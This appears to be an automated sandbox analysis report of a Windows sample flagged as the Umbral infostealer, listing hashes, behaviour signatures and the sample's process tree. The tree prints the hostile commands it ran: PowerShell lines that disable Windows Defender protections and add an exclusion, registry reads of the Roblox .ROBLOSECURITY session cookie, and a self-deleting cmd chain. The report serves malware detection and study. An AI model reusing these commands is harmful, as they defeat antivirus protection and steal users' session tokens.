Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01-06-2024 11:27
Behavioral task
behavioral1
Sample
25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe
Resource
win7-20240508-en
General
-
Target
25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe
-
Size
235KB
-
MD5
32099bdcf2a8c75821bc048193d3b1f5
-
SHA1
3a28da976bdb4f301dc94afcd0cf2ed60e0c0065
-
SHA256
25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19
-
SHA512
e13e0c78cff7e9603c2cee4c720d5680c3ddbd0a21303dcd67733c06f284f7657cdfd10544e6cab470f4d92129a5e8c98684cb518b204ffcfba439249bcaa18c
-
SSDEEP
6144:TloZM+rIkd8g+EtXHkv/iD4agl0LxCqVYQhTuOLKDb8e1moiLiP:RoZtL+EP8agl0LxCqVYQhTuOLM3J
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1004-1-0x00000281F4A80000-0x00000281F4AC0000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops file in Drivers directory 1 IoCs
Processes:
25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe 3552 powershell.exe 3552 powershell.exe 1924 powershell.exe 1924 powershell.exe 4624 powershell.exe 4624 powershell.exe 2704 powershell.exe 2704 powershell.exe 2436 powershell.exe 2436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe Token: SeIncreaseQuotaPrivilege 1772 wmic.exe Token: SeSecurityPrivilege 1772 wmic.exe Token: SeTakeOwnershipPrivilege 1772 wmic.exe Token: SeLoadDriverPrivilege 1772 wmic.exe Token: SeSystemProfilePrivilege 1772 wmic.exe Token: SeSystemtimePrivilege 1772 wmic.exe Token: SeProfSingleProcessPrivilege 1772 wmic.exe Token: SeIncBasePriorityPrivilege 1772 wmic.exe Token: SeCreatePagefilePrivilege 1772 wmic.exe Token: SeBackupPrivilege 1772 wmic.exe Token: SeRestorePrivilege 1772 wmic.exe Token: SeShutdownPrivilege 1772 wmic.exe Token: SeDebugPrivilege 1772 wmic.exe Token: SeSystemEnvironmentPrivilege 1772 wmic.exe Token: SeRemoteShutdownPrivilege 1772 wmic.exe Token: SeUndockPrivilege 1772 wmic.exe Token: SeManageVolumePrivilege 1772 wmic.exe Token: 33 1772 wmic.exe Token: 34 1772 wmic.exe Token: 35 1772 wmic.exe Token: 36 1772 wmic.exe Token: SeIncreaseQuotaPrivilege 1772 wmic.exe Token: SeSecurityPrivilege 1772 wmic.exe Token: SeTakeOwnershipPrivilege 1772 wmic.exe Token: SeLoadDriverPrivilege 1772 wmic.exe Token: SeSystemProfilePrivilege 1772 wmic.exe Token: SeSystemtimePrivilege 1772 wmic.exe Token: SeProfSingleProcessPrivilege 1772 wmic.exe Token: SeIncBasePriorityPrivilege 1772 wmic.exe Token: SeCreatePagefilePrivilege 1772 wmic.exe Token: SeBackupPrivilege 1772 wmic.exe Token: SeRestorePrivilege 1772 wmic.exe Token: SeShutdownPrivilege 1772 wmic.exe Token: SeDebugPrivilege 1772 wmic.exe Token: SeSystemEnvironmentPrivilege 1772 wmic.exe Token: SeRemoteShutdownPrivilege 1772 wmic.exe Token: SeUndockPrivilege 1772 wmic.exe Token: SeManageVolumePrivilege 1772 wmic.exe Token: 33 1772 wmic.exe Token: 34 1772 wmic.exe Token: 35 1772 wmic.exe Token: 36 1772 wmic.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 4624 powershell.exe Token: SeDebugPrivilege 2704 powershell.exe Token: SeIncreaseQuotaPrivilege 3528 wmic.exe Token: SeSecurityPrivilege 3528 wmic.exe Token: SeTakeOwnershipPrivilege 3528 wmic.exe Token: SeLoadDriverPrivilege 3528 wmic.exe Token: SeSystemProfilePrivilege 3528 wmic.exe Token: SeSystemtimePrivilege 3528 wmic.exe Token: SeProfSingleProcessPrivilege 3528 wmic.exe Token: SeIncBasePriorityPrivilege 3528 wmic.exe Token: SeCreatePagefilePrivilege 3528 wmic.exe Token: SeBackupPrivilege 3528 wmic.exe Token: SeRestorePrivilege 3528 wmic.exe Token: SeShutdownPrivilege 3528 wmic.exe Token: SeDebugPrivilege 3528 wmic.exe Token: SeSystemEnvironmentPrivilege 3528 wmic.exe Token: SeRemoteShutdownPrivilege 3528 wmic.exe Token: SeUndockPrivilege 3528 wmic.exe Token: SeManageVolumePrivilege 3528 wmic.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.execmd.exedescription pid process target process PID 1004 wrote to memory of 1772 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 1772 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 1240 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe attrib.exe PID 1004 wrote to memory of 1240 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe attrib.exe PID 1004 wrote to memory of 3552 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 3552 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 1924 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 1924 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 4624 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 4624 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 2704 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 2704 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 3528 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 3528 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 3000 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 3000 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 3068 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 3068 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 2436 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 2436 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe powershell.exe PID 1004 wrote to memory of 3116 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 3116 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe wmic.exe PID 1004 wrote to memory of 2980 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe cmd.exe PID 1004 wrote to memory of 2980 1004 25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe cmd.exe PID 2980 wrote to memory of 2112 2980 cmd.exe PING.EXE PID 2980 wrote to memory of 2112 2980 cmd.exe PING.EXE -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe"C:\Users\Admin\AppData\Local\Temp\25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe"2⤵
- Views/modifies file attributes
PID:1240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:3000
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2436
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:3116
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\25c02277f2a8d87c337a7ed145b3aebe37df66811b7fa9f158dfb09af777fd19.exe" && pause2⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:2112
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
948B
MD574a6b79d36b4aae8b027a218bc6e1af7
SHA10350e46c1df6934903c4820a00b0bc4721779e5f
SHA25660c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04
SHA51260e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0
-
Filesize
1KB
MD5d3235ed022a42ec4338123ab87144afa
SHA15058608bc0deb720a585a2304a8f7cf63a50a315
SHA25610663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf
-
Filesize
1KB
MD58ad5d4ad8a98459f93b950042d102f34
SHA105936202f3a2b792fc0c146fe90ba96c9486d783
SHA2567a8d8f09e0734c537bf47b9768f1a8270d247879c1b246ea11836af9dc499e5e
SHA512abdbdd4e56f2f9ca4111fe95c8257e5c2985d21b8d73052fa1c409dd8cc3ba4b8c874d0f1ce04994c4b3a499381bf5baa3c617019293fd9e74ecf43e298e81bf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82